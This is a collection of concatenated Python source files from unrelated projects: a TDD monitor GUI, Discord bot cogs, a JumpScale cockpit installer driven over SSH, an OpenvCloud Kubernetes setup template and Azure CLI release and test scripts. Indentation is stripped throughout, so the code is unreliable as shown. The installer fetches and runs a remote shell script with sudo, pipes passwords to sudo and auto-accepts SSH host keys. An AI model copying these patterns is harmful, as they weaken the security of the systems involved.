def __init__(self, cmdrunner, analyzer):
self.cmdrunner = cmdrunner
self.analyzer = analyzer
def run(self, test_script):
"""
Runns the test runner script and returns the analysed output.
"""
output = self.cmdrunner('python "%s"' % test_script)
return self.analyzer.analyze(output)
class Analyzer:
"""
Analyzer
Analyzes unittest output to find green and total number of tests.
Collaborators: logger, log messages a written to the log
"""
def __init__(self, logger):
self.logger = logger
def analyze(self, txt):
"""
Analyses the out put from a unittest and returns a tupple of
(passed/green, total)
"""
if len(txt.strip()) == 0:
return (0, 0)
toprow = txt.splitlines()[0]
green = toprow.count('.')
total = len(toprow)
if green < total:
self.logger.log(txt)
return (green, total)
class Logger:
"""
Logger, remembers log messages.
"""
def __init__(self):
self.complete_log = ""
def log(self, message):
"""
Adds message to the log
"""
self.complete_log = self.complete_log + message
def get_log(self):
"""
returns the log as a string
"""
return self.complete_log
def clear(self):
"""
clears all entries in the log
"""
self.complete_log = ""
## Rows above this are unit-tested.
## Rows below this are not unit-tested.
def remove_tmp_files():
"""
Clean up all tempfiles after us.
"""
safe_remove(RUN_TESTS_SCRIPT_FILE)
if os.path.exists(TEMP_FILE_DIR_NAME):
os.removedirs(TEMP_FILE_DIR_NAME)
atexit.register(remove_tmp_files)
class RealFileInfo(object):
"""
A adapter to easy finde info of a file.
"""
@staticmethod
def get_size(filename):
"returns the size of a file"
return os.stat(filename).st_size
@staticmethod
def get_modified_time(filename):
"returns the time the file was last modified"
return os.stat(filename).st_mtime
@staticmethod
def get_name_hash(path):
"""
returns a hash of the name of the path
"""
return hash(path)
def find_monitored_files():
" Finds all python modules in current directory and subdirectories "
monitored_files = []
for path, _folders, files in os.walk("."):
for filename in files:
if re_complete_match(PYTHON_FILE_REGEXP, filename):
monitored_file = os.path.join(path, filename)
monitored_files.append(monitored_file)
return monitored_files
def find_test_files_recursively():
"""
Scan recursively for unit test files in current folder
and in folders which are packages. Packages are assumed
to contain the word 'test'. The same holds true for unit
test files, with the additional condition that they are
assumed to end with '.py'.
"""
test_files = []
for path, folders, files in os.walk("."):
for filename in files:
if re_complete_match(TEST_FILE_REGEXP, filename):
test_file = os.path.join(path, filename)
test_files.append(test_file)
folders[:] = [
folder
for folder in folders
if os.path.isfile(
os.path.join(path, folder, "__init__.py")
)
]
return test_files
def finder_with_fixed_fileset(fileset):
"""
Module finder which always returns the
same file list.
"""
def find():
"returns the sent-in file set"
return fileset
return find
def safe_remove(path):
"removes path and ignores all exceptions."
try:
os.unlink(path)
except OSError:
pass
def run_cmdline(cmdline):
"runs a cmd and returns its output"
lst = shlex.split(cmdline)
use_shell = True if ON_WINDOWS else False
cmd = Popen(lst, stdout=PIPE, stderr=STDOUT, shell=use_shell)
output = cmd.communicate()[0]
if os.path.exists(TEMP_OUT_FILE_NAME):
output = open(TEMP_OUT_FILE_NAME).read()
os.remove(TEMP_OUT_FILE_NAME)
return output
def write_file(filename, content):
"""
Writes a string of text to a file, overwriting
any previous file with the same name.
"""
f_hand = open(filename, 'w')
f_hand.write(content)
f_hand.close()
def message_window(message):
"creates and shows a window with the message"
win = tk.Toplevel()
win.wm_attributes("-topmost", 1)
if ON_WINDOWS:
win.attributes("-toolwindow", 1)
win.title('Details')
message = message.replace('\r\n', '\n')
text = tk.Text(win)
text.insert(tk.INSERT, message)
text['state'] = tk.DISABLED
text.pack(expand=1, fill='both')
text.focus_set()
class PytddmonFrame(tk.Frame):
"The Main GUI of pytddmon"
def __init__(self, root=None, files=None, test_mode=False):
tk.Frame.__init__(self, root)
self.button = None
self.test_mode = test_mode
self.master.title("pytddmon")
self.master.resizable(0, 0)
self.create_button()
self.grid()
self.failures = 0
self.last_checksum = None # important to be different from any number
self.num_tests = 0
self.num_tests_prev = 0
self.num_tests_diff = 0
self.logger = Logger()
self.color_picker = ColorPicker()
self.runner = TestScriptRunner(run_cmdline, Analyzer(self.logger))
self.monitoring = os.getcwd()
finder = None
if files != None:
self.monitoring = ' '.join(files)
finder = finder_with_fixed_fileset(files)
else:
finder = find_test_files_recursively
self.script_writer = ScriptWriter(
finder,
write_file,
build_run_script
)
self.color_table = {
(True, 'green'): '0f0',
(False, 'green'): '0c0',
(True, 'red'): 'f00',
(False, 'red'): 'c00',
(True, 'gray'): '999',
(False, 'gray'): '555'
}
self.look_for_changes()
@staticmethod
def compute_checksum():
"returns the checksum for all the sourcefiles as a single integer."
files = find_monitored_files()
try:
files.remove(RUN_TESTS_SCRIPT_FILE)
except ValueError:
pass
return calculate_checksum(files, RealFileInfo())
def get_number_of_failures(self):
"""Returns the number of faild tests"""
self.script_writer.write_script()
(green, total) = self.runner.run(RUN_TESTS_SCRIPT_FILE)
self.num_tests_prev = self.num_tests
self.num_tests = total
return total - green
@staticmethod
def clock_string():
"Formating the time for better readability"
return strftime("%H:%M:%S", gmtime())
def create_button(self):
"Initialize the Button label."
button_width = 8
if not ON_WINDOWS:
# Hack: Window title cut if button too small!
button_width = 10
self.button = tk.Label(self,
text='pytddmon',
width=button_width,
relief='raised',
font=("Helvetica", 16),
justify=tk.CENTER,
anchor=tk.CENTER)
self.button.bind("<Button-1>", self.button_clicked)
self.button.pack(expand=1, fill='both')
def button_clicked(self, _widget):
"Event method triggerd if the button is clicked."
msg = "Monitoring: %s\n%s" % (self.monitoring, self.logger.get_log())
message_window(msg)
def get_green_and_total(self):
"""
Calculate the green results and returns that together with the
total of tests as a tuple.
"""
return (self.num_tests-self.failures, self.num_tests)
def update_gui(self):
"Calls all update methods related to the gui"
(green, total) = self.get_green_and_total()
self.update_gui_color(green, total)
self.update_gui_text(green, total)
def update_gui_color(self, green, total):
"""
Calculates the new background color and tells the GUI to switch
to it.
"""
self.color_picker.set_result( green, total )
(light, color) = self.color_picker.pick()
self.color_picker.pulse()
rgb = '#' + self.color_table[(light, color)]
self.button.configure(bg=rgb, activebackground=rgb)
self.configure(background=rgb)
def update_gui_text(self, green, total):
"Updates the text of the Main GUI."
txt = win_text(
passing_tests=green,
total_tests=total
)
self.button.configure(text=txt)
def look_for_changes(self):
"Look for changes in source files and runs tests if needed."
newval = self.compute_checksum()
if newval != self.last_checksum:
self.last_checksum = newval
self.logger.clear()
self.logger.log('[%s] Running all tests...\n' % self.clock_string())
self.failures = self.get_number_of_failures()
self.logger.log(
'[%s] Number of failures: %d\n' % (
self.clock_string(),
self.failures
)
)
self.update_gui()
if self.test_mode:
file_h = open(TEST_MODE_LOG_FILE, "w")
(green, total) = self.get_green_and_total()
lines = [ 'green='+str(green), 'total='+str(total) ]
file_h.write('\n'.join(lines))
file_h.close()
self.master.destroy()
else:
self.after(750, self.look_for_changes)
def filter_existing_files(files):
"simple filtering function checking for existence of files"
return [f for f in files if os.path.exists(f)]
def parse_commandline():
"""
returns (files, test_mode) created from the command line arguments
passed to pytddmon.
"""
parser = optparse.OptionParser()
parser.add_option("--log-and-exit", action="store_true", default=False)
(options, args) = parser.parse_args()
return (args, options.log_and_exit)
def run():
"""
The main function: basic initialization and program start
"""
# Command line argument handling
(static_file_set, test_mode) = parse_commandline()
static_file_set = filter_existing_files(static_file_set)
# Basic tkinter initialization
root = tk.Tk()
root.wm_attributes("-topmost", 1)
if ON_WINDOWS:
root.attributes("-toolwindow", 1)
if not test_mode:
print("Minimize me!")
# Create main window
if len(static_file_set)>0:
PytddmonFrame(root, static_file_set, test_mode=test_mode)
else:
PytddmonFrame(root, test_mode=test_mode)
# Main loop
try:
root.mainloop()
except Exception as exception:
print(exception)
if __name__ == '__main__':
run()
``` |
{
"source": "0ceanlight/mcbeDiscordBot",
"score": 3
} |
#### File: mcbeDiscordBot/cogs/logs.py
```python
import discord
from discord.ext import commands
class Logs(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_message_delete(self, message):
if message.id in self.bot.messageBlacklist:
self.bot.messageBlacklist.remove(message.id)
return
if message.guild.id != 574267523869179904:
return
if message.author.color.value == 0:
color = 16777210
else:
color = message.author.color
channel = self.bot.get_channel(
int(self.bot.config[str(message.guild.id)]["logs_channel"])
)
embed = discord.Embed(
title="**Deleted Message**", color=color, timestamp=message.created_at
)
embed.add_field(name="**User**", value=message.author.mention, inline=True)
embed.add_field(name="**Channel**", value=message.channel.mention, inline=True)
embed.add_field(name="**Message**", value=message.content, inline=False)
await channel.send(embed=embed)
@commands.Cog.listener()
async def on_message_edit(self, before, after):
if before.content == after.content:
return
if after.guild.id != 574267523869179904:
return
channel = self.bot.get_channel(
int(self.bot.config[str(before.guild.id)]["logs_channel"])
)
if before.author.color.value == 0:
color = 16777210
else:
color = before.author.color
embed = discord.Embed(
title="**Edited Message**", color=color, timestamp=after.edited_at
)
embed.add_field(name="**User**", value=before.author.mention, inline=True)
embed.add_field(name="**Channel**", value=before.channel.mention, inline=True)
embed.add_field(name="**Original Message**", value=before.content, inline=False)
embed.add_field(name="**New Message**", value=after.content, inline=False)
await channel.send(embed=embed)
def setup(bot):
bot.add_cog(Logs(bot))
```
#### File: mcbeDiscordBot/cogs/twitter.py
```python
import json
import discord
import requests
import tweepy
from discord.ext import commands, tasks
class StreamListener(tweepy.StreamListener):
def __init__(self):
with open("./config.json") as f:
self.config = json.load(f)
def on_error(self, status_code: int) -> bool:
if status_code == 420:
print("Rate limit reached. ")
# returning False in on_error disconnects the stream
return False
def on_data(self, data):
data = json.loads(data)
try:
tweetUser = data["tweet"]["user"]["screen_name"]
tweetID = data["tweet"]["id_str"]
except:
tweetUser = data["user"]["screen_name"]
tweetID = data["id_str"]
tweetLink = f"https://twitter.com/{tweetUser}/status/{tweetID}"
body = {"content": tweetLink}
global config
r = requests.post(
self.config["574267523869179904"]["tweetWebhook"],
headers={"Content-Type": "application/json"},
data=json.dumps(body),
) # config['574267523869179904']['tweetWebhook'], data=json.dumps(body))
print(r.status_code)
print(r.text)
# print(json.dumps(data, indent='\t'))
class Twitter(commands.Cog):
def __init__(self, bot):
self.bot = bot
auth = tweepy.OAuthHandler(
self.bot.config["twitter"]["consumer_key"],
self.bot.config["twitter"]["consumer_secret"],
)
auth.set_access_token(
self.bot.config["twitter"]["access_token"],
self.bot.config["twitter"]["access_token_secret"],
)
api = tweepy.API(auth)
myStreamListener = StreamListener()
stream = tweepy.Stream(auth=api.auth, listener=myStreamListener)
stream.filter(follow=["1287799985040437254"], is_async=True)
def setup(bot):
bot.add_cog(Twitter(bot))
``` |
{
"source": "0-coding/python_examples",
"score": 3
} |
#### File: python_examples/source/unittest_to_io.py
```python
import unittest
class WidgetTestCase(unittest.TestCase):
def test_default_widget_size(self):
self.assertEqual((50,50), (50,50),
'incorrect default size')
def test_widget_resize(self):
self.assertEqual((100,150), (100,150),
'wrong size after resize')
def suite():
suite = unittest.TestSuite()
suite.addTest(WidgetTestCase('test_default_widget_size'))
suite.addTest(WidgetTestCase('test_widget_resize'))
return suite
if __name__ == '__main__':
from io import StringIO
stream = StringIO()
runner = unittest.TextTestRunner(stream=stream, verbosity=2)
runner.run(suite())
stream.seek(0)
print('Test output\n' + stream.read())
``` |
{
"source": "0-complexity/ays_automatic_cockpit_based_testing",
"score": 2
} |
#### File: Framework/Installer/ExecuteRemoteCommands.py
```python
from cockpit_testing.Framework.utils.utils import BaseTest
import paramiko, requests, time, subprocess, os, re
class ExecuteRemoteCommands:
def __init__(self, ip, port, username, password):
self.ip = ip
self.port = port
self.username = username
self.password = password
self.baseTest = BaseTest()
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.connect_to_virtual_machine()
self.sftp = self.ssh.open_sftp()
script_dir = os.path.dirname(__file__)
self.portal_config_source = os.path.join(script_dir, '../../production_config/portal_config_source.hrd')
self.api_config_source = os.path.join(script_dir, '../../production_config/api_config_source.toml')
self.api_config = os.path.join(script_dir, '../../production_config/api_config.toml')
self.portal_config = os.path.join(script_dir, '../../production_config/portal_config.hrd')
def connect_to_virtual_machine(self):
self.baseTest.logging.info(' [*] Connecting to the virtual machine .. ')
print(' [*] Connecting to the virtual machine .. ')
for _ in range(300):
try:
self.ssh.connect(self.ip, port=self.port, username=self.username, password=self.password)
break
except:
time.sleep(2)
self.baseTest.logging.info(' [*] Trying to connect to the virtual machine .. ')
else:
self.ssh.connect(self.ip, port=self.port, username=self.username, password=self.password)
def update_machine(self):
self.baseTest.logging.info(' [*] Updating virtual machine OS ... ')
print(' [*] Updating virtual machine OS ... ')
command = 'echo %s | sudo -S apt-get update' % self.password
self.execute_command(command=command)
def install_js(self, branch):
self.baseTest.logging.info(' [*] Creating jsInstaller file .... ')
print(' [*] Creating jsInstaller file .... ')
command = """echo 'cd $TMPDIR;\nexport JSBRANCH=%s;\ncurl -k https://raw.githubusercontent.com/Jumpscale/jumpscale_core8/$JSBRANCH/install/install.sh?$RANDOM > install.sh;\nbash install.sh;' > jsInstaller.sh""" % branch
self.execute_command(command=command)
self.baseTest.logging.info(' [*] Executing jsInstaller from %s branch .... ' % branch)
print(' [*] Executing jsInstaller .... ')
command = 'echo %s | sudo -S bash jsInstaller.sh' % self.password
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in executing jsInstaller file .... ')
print(' [*] FAIL : fail in executing jsInstaller file .... ')
# raise NameError(' [*] FAIL : fail in executing jsInstaller file .... ')
def install_cockpit(self, branch):
self.baseTest.logging.info(' [*] Creating cockpitInstaller.py file ... ')
print(' [*] Creating cockpitInstaller.py file ... ')
if branch == '8.1.0' or branch == '8.1.1':
command = """echo 'from JumpScale import j\ncuisine = j.tools.cuisine.local\ncuisine.solutions.cockpit.install_all_in_one(start=True, branch="%s", reset=True, ip="%s")' > cockpitInstaller.py""" % (
branch, self.ip)
else:
command = """echo 'from JumpScale import j\ncuisine = j.tools.cuisine.local\ncuisine.apps.portal.install()' > cockpitInstaller.py"""
self.execute_command(command=command)
self.baseTest.logging.info(' [*] Executing cockpitInstaller from %s brnach ... ' % branch)
print(' [*] Executing cockpitInstaller.py file ... ')
command = 'echo %s | sudo -S jspython cockpitInstaller.py' % self.password
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in executing cockpitInstaller file .... ')
print((' [*] FAIL : fail in executing cockpitInstaller file .... '))
elif branch != '8.1.0' and branch != '8.1.1':
command = 'echo %s | sudo -S ays start' % self.password
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in running "ays start" .... ')
print((' [*] FAIL :fail in running "ays start" .... '))
def execute_command(self, command):
try:
stdin, stdout, stderr = self.ssh.exec_command(command)
tracback = stdout.readlines()
return tracback
except:
self.baseTest.logging.error(" [*] ERROR : Can't execute %s command" % command)
def check_cockpit_portal(self, cockpit_ip):
url = 'http://' + cockpit_ip
for _ in range(5):
try:
response = requests.get(url=url)
except:
time.sleep(5)
continue
else:
if response.status_code == 200:
self.baseTest.logging.info(' [*] You can access the new cockpit on : http:%s ' % self.ip)
print((' [*] You can access the new cockpit on : http://%s ' % self.ip))
return True
else:
time.sleep(5)
continue
else:
print(' [*] [X] FAIL : Please, Check installtion files in %s vm ' % cockpit_ip)
self.baseTest.logging.error(' [*] FAIL : Please, Check installtion files in %s vm ' % cockpit_ip)
return False
def check_branchs_values(self, branch):
self.baseTest.logging.info(' [*] Getting branches versions ... ')
print(' [*] Getting branches versions ... ')
dir = ['ays_jumpscale8', 'jscockpit', 'jumpscale_core8', 'jumpscale_portal8']
for item in dir:
command = 'cd /opt/code/github/jumpscale/%s && git branch' % item
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in getting %s branch .... ' % item)
print(' [*] FAIL : fail in getting %s branch version .... ' % item)
elif branch not in result[0]:
self.baseTest.logging.error(
' [*] ERROR : %s branch is not matching with %s:%s branch' % (branch, item, result))
print(' [*] ERROR : %s branch is not matching with %s:%s branch' % (branch, item, result))
else:
self.baseTest.logging.error(
' [*] OK : %s branch is matching with %s:%s branch' % (branch, item, result))
print(' [*] OK : %s branch is matching with %s:%s branch' % (branch, item, result))
def trasport_file(self, filepath):
file_name = filepath.split('/')[-1]
self.sftp.put(filepath, file_name)
def generat_production_config_files(self):
client_id = self.baseTest.values['client_id']
client_secret = self.baseTest.values['client_secret']
open("tmp", "w").writelines([l for l in open(self.portal_config_source).readlines()])
with open(self.portal_config, 'w') as portal:
with open('tmp') as tmp:
for line in tmp:
if 'param.cfg.production' in line:
portal.write('param.cfg.production = true\n')
elif 'param.cfg.client_scope' in line:
portal.write("param.cfg.client_scope = 'user:email:main,user:memberof:%s'\n" % client_id)
elif 'param.cfg.force_oauth_instance' in line:
portal.write("param.cfg.force_oauth_instance = 'itsyou.online'\n")
elif 'param.cfg.client_id' in line:
portal.write("param.cfg.client_id = '%s'\n" % client_id)
elif 'param.cfg.client_secret' in line:
portal.write("param.cfg.client_secret = '%s'\n" % client_secret)
elif 'param.cfg.redirect_url' in line:
portal.write(
"param.cfg.redirect_url = 'http://%s/restmachine/system/oauth/authorize'\n" % self.ip)
elif 'param.cfg.client_user_info_url' in line:
portal.write("param.cfg.client_user_info_url = 'https://itsyou.online/api/users/'\n")
elif 'param.cfg.token_url' in line:
portal.write("param.cfg.token_url = 'https://itsyou.online/v1/oauth/access_token'\n")
elif 'param.cfg.organization =' in line:
portal.write("param.cfg.organization = '%s'\n" % client_id)
elif 'param.cfg.oauth.default_groups' in line:
portal.write("param.cfg.oauth.default_groups = 'admin', 'user',\n")
else:
portal.write(line)
portal.close()
open("tmp", "w").writelines([l for l in open(self.api_config_source).readlines()])
with open(self.api_config, 'w') as api:
with open('tmp') as tmp:
for line in tmp:
if 'prod = false' in line:
api.write('prod = true\n')
elif 'organization = ' in line:
api.write('organization = "%s" \n' % client_id)
elif 'redirect_uri = ' in line:
api.write('redirect_uri = "http://%s/api/oauth/callback"\n' % self.ip)
elif 'client_secret =' in line:
api.write('client_secret = "%s"\n' % client_secret)
elif 'client_id = ' in line:
api.write('client_id = "%s" \n' % client_id)
elif 'jwt' in line:
api.write(
'jwt_key = "-----<KEY>"')
else:
api.write(line)
api.close()
def move_produciton_file(self):
self.baseTest.logging.info(' [*] Moving production config files .... ')
print(' [*] Moving production config files .... ')
command = 'echo %s | sudo -S mv -f /home/cloudscalers/api_config.toml /optvar/cfg/cockpit_api/config.toml' % self.password
self.execute_command(command=command)
command = 'echo %s | sudo -S mv -f /home/cloudscalers/portal_config.hrd /optvar/cfg/portals/main/config.hrd' % self.password
self.execute_command(command=command)
def restart_cockpit_services(self):
self.baseTest.logging.info(' [*] Restarting cockpit services .... ')
print(' [*] Restarting cockpit services .... ')
command = 'echo %s | sudo -S service portal restart && sudo -S service cockpit_main restart && sudo -S service cockpit_daemon_main restart' % self.password
self.execute_command(command=command)
def remove_tmp_files(self):
subprocess.call('rm %s' % self.api_config, shell=True)
subprocess.call('rm %s' % self.portal_config, shell=True)
script_dir = os.path.dirname(__file__)
subprocess.call('rm %s' % os.path.join(script_dir, '../../../tmp'), shell=True)
def production_mode(self):
self.generat_production_config_files()
self.trasport_file(self.portal_config)
self.trasport_file(self.api_config)
self.move_produciton_file()
self.restart_cockpit_services()
self.remove_tmp_files()
print(
' [*] Please, Update the callback url of ITSYOUONLINE to be http://%s/restmachine/system/oauth/authorize' % self.ip)
``` |
{
"source": "0-complexity/kubernetes",
"score": 2
} |
#### File: templates/setup/setup.py
```python
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
class Setup(TemplateBase):
version = '0.0.1'
template_name = "setup"
SSHKEY_TEMPLATE = 'github.com/openvcloud/0-templates/sshkey/0.0.1'
OVC_TEMPLATE = 'github.com/openvcloud/0-templates/openvcloud/0.0.1'
ACCOUNT_TEMPLATE = 'github.com/openvcloud/0-templates/account/0.0.1'
VDC_TEMPLATE = 'github.com/openvcloud/0-templates/vdc/0.0.1'
NODE_TEMPLATE = 'github.com/openvcloud/0-templates/node/0.0.1'
ZROBOT_TEMPLATE = 'github.com/openvcloud/0-templates/zrobot/0.0.1'
K8S_TEMPLATE = 'github.com/openvcloud/kubernetes/kubernetes/0.0.1'
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
self._config = None
def validate(self):
for key in ['vdc', 'workers', 'sshKey']:
value = self.data[key]
if not value:
raise ValueError('"%s" is required' % key)
@property
def config(self):
'''
returns an object with names of vdc, account, and ovc
'''
if self._config is not None:
return self._config
config = {
'vdc': self.data['vdc'],
}
# traverse the tree up words so we have all info we need to return, connection and
# account
matches = self.api.services.find(template_uid=self.VDC_TEMPLATE, name=config['vdc'])
if len(matches) != 1:
raise RuntimeError('found %d vdcs with name "%s"' % (len(matches), config['vdc']))
vdc = matches[0]
self._vdc = vdc
task = vdc.schedule_action('get_account')
task.wait()
config['account'] = task.result
matches = self.api.services.find(template_uid=self.ACCOUNT_TEMPLATE, name=config['account'])
if len(matches) != 1:
raise ValueError('found %s accounts with name "%s"' % (len(matches), config['account']))
account = matches[0]
# get connection
task = account.schedule_action('get_openvcloud')
task.wait()
config['ovc'] = task.result
self._config = config
return self._config
def _find_or_create(self, zrobot, template_uid, service_name, data):
found = zrobot.services.find(
template_uid=template_uid,
name=service_name
)
if len(found) != 0:
return found[0]
return zrobot.services.create(
template_uid=template_uid,
service_name=service_name,
data=data
)
def _ensure_helper(self):
name = '%s-little-helper' % self.name
node = self._find_or_create(
self.api,
template_uid=self.NODE_TEMPLATE,
service_name=name,
data={
'vdc': self.data['vdc'],
'sshKey': self.data['sshKey'],
'sizeId': 2,
}
)
task = node.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
return node
def _ensure_zrobot(self, helper):
name = '%s-little-bot' % self.name
bot = self._find_or_create(
self.api,
template_uid=self.ZROBOT_TEMPLATE,
service_name=name,
data={
'node': helper.name,
'port': 6600,
'templates': [
'https://github.com/openvcloud/0-templates.git',
'https://github.com/openvcloud/kubernetes.git',
],
},
)
# update data in the disk service
task = bot.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
return bot
def _mirror_services(self, zrobot):
config = self.config
ovc = j.clients.openvcloud.get(config['ovc'])
self._find_or_create(
zrobot,
template_uid=self.SSHKEY_TEMPLATE,
service_name='%s-ssh' % self.name,
data={
'passphrase': <PASSWORD>wd(20, 'ABCDEF<PASSWORD>'),
}
)
self._find_or_create(
zrobot,
template_uid=self.OVC_TEMPLATE,
service_name=config['ovc'],
data={
'address': ovc.config.data['address'],
'port': ovc.config.data['port'],
'location': ovc.config.data['location'],
'token': ovc.config.data['jwt_'],
}
)
account = self._find_or_create(
zrobot,
template_uid=self.ACCOUNT_TEMPLATE,
service_name=config['account'],
data={
'openvcloud': config['ovc'],
'create': False,
}
)
vdc = self._find_or_create(
zrobot,
template_uid=self.VDC_TEMPLATE,
service_name=config['vdc'],
data={
'account': config['account'],
'create': False,
}
)
# make sure they are installed
for instance in [account, vdc]:
task = instance.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
def _deply_k8s(self, zrobot):
k8s = self._find_or_create(
zrobot,
template_uid=self.K8S_TEMPLATE,
service_name=self.name,
data={
'workersCount': self.data['workers'],
'sizeId': self.data['sizeId'],
'dataDiskSize': self.data['dataDiskSize'],
'sshKey': '%s-ssh' % self.name,
'vdc': self.data['vdc']
}
)
task = k8s.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
return task.result
def install(self):
try:
self.state.check('actions', 'install', 'ok')
return
except StateCheckError:
pass
helper = self._ensure_helper()
bot = self._ensure_zrobot(helper)
zrobot = self.api.robots[bot.name]
self._mirror_services(zrobot)
self.data['credentials'] = self._deply_k8s(zrobot)
# next step, make a deployment
self.state.set('actions', 'install', 'ok')
``` |
{
"source": "0cool321/azure-cli",
"score": 2
} |
#### File: automation/release/run.py
```python
from __future__ import print_function
import argparse
import os
import tempfile
from subprocess import check_call
from .version_patcher import VersionPatcher
from ..utilities.path import get_all_module_paths
def build(pkg_path, dest):
"""
pkg_path - Full path to directory of the package to build
dest - Destination for the built package
"""
check_call(['python', 'setup.py', 'sdist', '-d', dest, 'bdist_wheel', '-d', dest], cwd=pkg_path)
def release(pkg_dir, repo):
"""Release all packages in a directory"""
pkgs = [os.path.join(pkg_dir, f) for f in os.listdir(pkg_dir)]
for pkg in pkgs:
check_call(['twine', 'register', '--repository-url', repo, '--repository', repo, pkg])
check_call(['twine', 'upload', '--repository-url', repo, '--repository', repo, pkg])
def run_build_release(component_name, repo, use_version_patch=True):
"""
component_name - The full component name (e.g. azure-cli, azure-cli-core, azure-cli-vm, etc.)
"""
for comp_name, comp_path in get_all_module_paths():
if comp_name == component_name:
pkg_dir = tempfile.mkdtemp()
patcher = VersionPatcher(use_version_patch, component_name, comp_path)
patcher.patch()
build(comp_path, pkg_dir)
patcher.unpatch()
print("Built '{}' to '{}'".format(comp_name, pkg_dir))
if repo:
release(pkg_dir, repo)
return
raise ValueError("No component found with name '{}'".format(component_name))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Automated build and release of a component. To only build, don't specify the"
" repo parameter. The environment variables TWINE_USERNAME and TWINE_PASSWORD "
"are required if releasing.")
parser.add_argument('--component', '-c', required=True,
help='Component name (e.g. azure-cli, azure-cli-vm, etc.)')
parser.add_argument('--no-version-patch', action='store_false',
help="By default, we patch the version number of the package to remove "
"'+dev' if it exists.")
parser.add_argument('--repo', '-r',
help='Repository URL for release (e.g. https://pypi.python.org/pypi, '
'https://testpypi.python.org/pypi)')
args = parser.parse_args()
if args.repo:
assert os.environ.get('TWINE_USERNAME') and os.environ.get('TWINE_PASSWORD'), \
"Set TWINE_USERNAME and TWINE_PASSWORD environment variables to authentication with " \
"PyPI repository."
run_build_release(args.component,
args.repo,
args.no_version_patch)
```
#### File: batch/tests/test_batch_mgmt_commands.py
```python
import os
from azure.cli.core.test_utils.vcr_test_base import (ResourceGroupVCRTestBase, JMESPathCheck,
NoneCheck)
def _before_record_response(response):
# ignore any 401 responses during playback
if response['status']['code'] == 401:
response = None
return response
class BatchMgmtAccountScenarioTest(ResourceGroupVCRTestBase):
def tear_down(self):
rg = self.resource_group
name = self.storage_account_name
self.cmd('storage account delete -g {} -n {}'.format(rg, name))
def __init__(self, test_method):
super(BatchMgmtAccountScenarioTest, self).__init__(__file__, test_method)
self.resource_group = 'vcr_resource_group'
self.account_name = 'clibatchtest4'
self.location = 'brazilsouth'
self.storage_account_name = 'clibatchteststorage2'
def test_batch_account_mgmt(self):
self.execute()
def body(self):
rg = self.resource_group
name = self.account_name
loc = self.location
# test create storage account with default set
result = self.cmd('storage account create -g {} -n {} -l {} --sku Standard_LRS'.
format(rg, self.storage_account_name, loc),
checks=[
JMESPathCheck('name', self.storage_account_name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
sid = result['id']
# test create account with default set
self.cmd('batch account create -g {} -n {} -l {}'.format(rg, name, loc), checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
self.cmd('batch account set -g {} -n {} --storage-account-id {}'.
format(rg, name, sid),
checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
self.cmd('batch account show -g {} -n {}'.format(rg, name), checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg),
JMESPathCheck('autoStorage.storageAccountId', sid)
])
self.cmd('batch account autostorage-keys sync -g {} -n {}'.format(rg, name))
keys = self.cmd('batch account keys list -g {} -n {}'.format(rg, name), checks=[
JMESPathCheck('primary != null', True),
JMESPathCheck('secondary != null', True)
])
keys2 = self.cmd('batch account keys renew -g {} -n {} --key-name primary'.
format(rg, name),
checks=[
JMESPathCheck('primary != null', True),
JMESPathCheck('secondary', keys['secondary'])
])
self.assertTrue(keys['primary'] != keys2['primary'])
# test batch account delete
self.cmd('batch account delete -g {} -n {}'.format(rg, name))
self.cmd('batch account list -g {}'.format(rg), checks=NoneCheck())
self.cmd('batch location quotas show -l {}'.format(loc), checks=[
JMESPathCheck('accountQuota', 1)
])
class BatchMgmtApplicationScenarioTest(ResourceGroupVCRTestBase):
def set_up(self):
super(BatchMgmtApplicationScenarioTest, self).set_up()
rg = self.resource_group
sname = self.storage_account_name
name = self.account_name
loc = self.location
# test create account with default set
result = self.cmd('storage account create -g {} -n {} -l {} --sku Standard_LRS'.
format(rg, sname, loc), checks=[
JMESPathCheck('name', sname),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
self.cmd('batch account create -g {} -n {} -l {} --storage-account-id {}'.
format(rg, name, loc, result['id']), checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
def tear_down(self):
rg = self.resource_group
sname = self.storage_account_name
name = self.account_name
self.cmd('storage account delete -g {} -n {}'.format(rg, sname))
self.cmd('batch account delete -g {} -n {}'.format(rg, name))
if os.path.exists(self.package_file_name):
os.remove(self.package_file_name)
def __init__(self, test_method):
super(BatchMgmtApplicationScenarioTest, self).__init__(__file__, test_method)
self.resource_group = 'vcr_resource_group'
self.account_name = 'clibatchtest7'
self.location = 'brazilsouth'
self.storage_account_name = 'clibatchteststorage7'
self.application_name = 'testapp'
self.application_package_name = '1.0'
self.package_file_name = os.path.join(os.getcwd(), 'samplepackage.zip')
def test_batch_application_mgmt(self):
self.execute()
def body(self):
with open(self.package_file_name, 'w') as f:
f.write('storage blob test sample file')
rg = self.resource_group
name = self.account_name
aname = self.application_name
ver = self.application_package_name
# test create application with default set
self.cmd('batch application create -g {} -n {} --application-id {} --allow-updates true'.
format(rg, name, aname), checks=[
JMESPathCheck('id', aname),
JMESPathCheck('allowUpdates', True)
])
self.cmd('batch application list -g {} -n {}'.format(rg, name), checks=[
